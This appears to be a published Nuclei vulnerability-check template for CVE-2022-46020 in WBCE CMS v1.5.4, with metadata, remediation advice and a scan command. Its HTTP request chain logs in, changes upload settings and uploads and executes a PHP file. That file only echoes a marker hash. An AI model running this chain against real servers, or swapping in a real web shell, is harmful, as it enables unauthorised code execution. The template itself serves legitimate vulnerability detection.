WBCE CMS v1.5.4 - Remote Code Execution

ID: CVE-2022-46020

Severity: critical

Author: theamanrawat

Tags: cve,cve2022,rce,wbce,cms,authenticated,intrusive

Description

WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.

YAML Source

id: CVE-2022-46020

info:
  name: WBCE CMS v1.5.4 -  Remote Code Execution
  author: theamanrawat
  severity: critical
  description: |
    WBCE CMS v1.5.4 can implement getshell by modifying the upload file type.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade to a patched version of WBCE CMS v1.5.5 or later to mitigate this vulnerability.
  reference:
    - https://github.com/WBCE/WBCE_CMS
    - https://github.com/10vexh/Vulnerability/blob/main/WBCE%20CMS%20v1.5.4%20getshell.pdf
    - https://nvd.nist.gov/vuln/detail/CVE-2022-46020
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-46020
    cwe-id: CWE-434
    epss-score: 0.02229
    epss-percentile: 0.89506
    cpe: cpe:2.3:a:wbce:wbce_cms:1.5.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 6
    vendor: wbce
    product: wbce_cms
  tags: cve,cve2022,rce,wbce,cms,authenticated,intrusive

http:
  - raw:
      - |
        GET /admin/login/index.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /admin/login/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        url=&username_fieldname={{username_fieldname}}&password_fieldname={{password_fieldname}}&{{username_fieldname}}={{username}}&{{password_fieldname}}={{password}}&submit=Login
      - |
        GET /admin/settings/index.php?advanced=yes HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /admin/settings/save.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        advanced=yes&formtoken={{formtoken}}&website_title=test&website_description=&website_keywords=&website_header=&website_footer=&page_level_limit=4&page_trash=inline&page_languages=false&multiple_menus=true&home_folders=true&manage_sections=true&section_blocks=true&intro_page=false&homepage_redirection=false&smart_login=true&frontend_login=false&redirect_timer=1500&frontend_signup=false&er_level=E0&wysiwyg_editor=ckeditor&default_language=EN&default_charset=utf-8&default_timezone=0&default_date_format=d.m.Y&default_time_format=H%3Ai&default_template=wbcezon&default_theme=wbce_flat_theme&search=public&search_template=&search_footer=&search_max_excerpt=15&search_time_limit=0&page_spacer=-&app_name={{app_name}}&sec_anchor=wbce_&pages_directory=%2Fpages&media_directory=%2Fmedia&page_extension=.php&rename_files_on_upload=
      - |
        POST /modules/elfinder/ef/php/connector.wbce.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------213974337328367932543216511988

        -----------------------------213974337328367932543216511988
        Content-Disposition: form-data; name="reqid"

        test
        -----------------------------213974337328367932543216511988
        Content-Disposition: form-data; name="cmd"

        upload
        -----------------------------213974337328367932543216511988
        Content-Disposition: form-data; name="target"

        l1_Lw
        -----------------------------213974337328367932543216511988
        Content-Disposition: form-data; name="upload[]"; filename="{{randstr}}.php"
        Content-Type: application/x-php

        <?php

        echo md5("CVE-2022-46020");

        ?>

        -----------------------------213974337328367932543216511988
        Content-Disposition: form-data; name="mtime[]"

        test
        -----------------------------213974337328367932543216511988--
      - |
        GET /media/{{randstr}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_6
        words:
          - 751a8ba516522786d551075a092a7a84

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: username_fieldname
        group: 1
        regex:
          - name="username_fieldname" value="(.*)"
        internal: true
        part: body

      - type: regex
        name: password_fieldname
        group: 1
        regex:
          - name="password_fieldname" value="(.*)"
        internal: true
        part: body

      - type: regex
        name: formtoken
        group: 1
        regex:
          - name="formtoken" value="(.*)"
        internal: true
        part: body

      - type: regex
        name: app_name
        group: 1
        regex:
          - name="app_name" value="(.*)"
        internal: true
        part: body
# digest: 490a0046304402200fda5b682e885e938e300605af2c18409f5368ab5ad7a1bc8e990cf36a302161022077e2be833ded9c2725d41a9df013a8267711f2baca8f91efe8209c17d3e5cf57:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-46020.yaml"

View on Github